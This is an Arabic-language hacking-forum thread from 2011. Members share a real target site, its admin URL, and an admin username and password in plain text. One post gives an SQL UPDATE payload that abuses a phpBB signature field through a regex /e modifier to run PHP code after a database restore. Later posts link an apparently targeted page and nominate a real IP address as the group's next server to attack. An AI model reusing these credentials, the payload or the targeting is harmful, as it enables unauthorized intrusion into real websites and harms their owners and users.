[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)

SpookWeb · 07-04-2011, 03:45 AM

السيرفر راح يسببلي الجنوووووون :mad:

وسيلة لحد هنا:

http://www.cheela.org/cheelfor
http://www.cheela.org/cheelfor/admin
phpBB forum
username: vbondoux
he's admin...
pass: sZCnYyk8

جربت كتير, ماقدرت الاقي وسيلة لرفع الشيل. بس في طريقة غير...

تخلق فيل تسميه "Shell.sql" أو آية شي تاني... بس يكون sql.وتحت داخيلو

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo());' WHERE user_id=2;

وبعدها تعمل restore database من لوحة التحكم الادمن.

وفي تعديل ال profile نرى أن معلومات ال php ظهرت. يعني بالكود نبدل phpinfo() بـأي كود php تاني ويمشي. بس أنا مااعرف اش......... وللصراحة يئست منيل phpBB ورايح الدور على ثغرة تانية بـنفس الموقع.

المصدر: :: vBspiders Professional Network ::

tenshu2011 · 07-04-2011, 03:53 AM

الحمد لله أنك استفدت من فك التشفير

مشكلتي أني لا أعرف رفع الشال اذا لم أجد الأبلود
أو تحديد مكانه في url

bleu moon · 07-04-2011, 05:33 AM

مين رفع شل ؟

bleu moon · 07-04-2011, 09:27 AM

http://www.spalter-mikvehs.com/conta...=stylesheet%3E

abdellatef · 07-04-2011, 04:03 PM

الله عليك يا غالي م في سرفر اخر هدف ندعس ابوه
ولكن يكون مملوء مواقع 1000 او اكتر لكي يتوفر المجال لكل الهاكرز مبتدئ متوسط ..

bleu moon · 07-04-2011, 10:27 PM

اعطونا السيرفر يلي بدكم

SpookWeb · 07-05-2011, 12:29 AM

اش رأيكم بـهذا 62.90.118.148 ؟

bleu moon · 07-05-2011, 12:34 AM

اقتباس

المشاركة الأصلية كتبت بواسطة SpookWeb


	اش رأيكم بـهذا 62.90.118.148 ؟

على خاطرك

SpookWeb · 07-05-2011, 03:03 AM

اقتباس

المشاركة الأصلية كتبت بواسطة nor15din


	على خاطرك

مشكور يا غالي.

اقتباس

المشاركة الأصلية كتبت بواسطة nor15din


	شو رآيكم نضع مواقع احسن ؟ "عوض السيرفرات"

فكرة حلوة :yes:
برأيي وضع مواقع أحسن لأن الإستهداف العشوائي لسيرفر واحد ==>:ouch:

ووضع موقع واحد في عمل جماعي منتج اكثر من العشوائي... يمكن لإختراق الموقع نستخدم إستهداف السيرفر إذا ماوجدت فيه ثغرات, بس وقتها كلنا حنروح نكتشف موقع واحد اخر مصاب عالسيرفر. يعني عدنا للعمل الجماعي.

هذا رأيي الشخصي فقط...:whistle: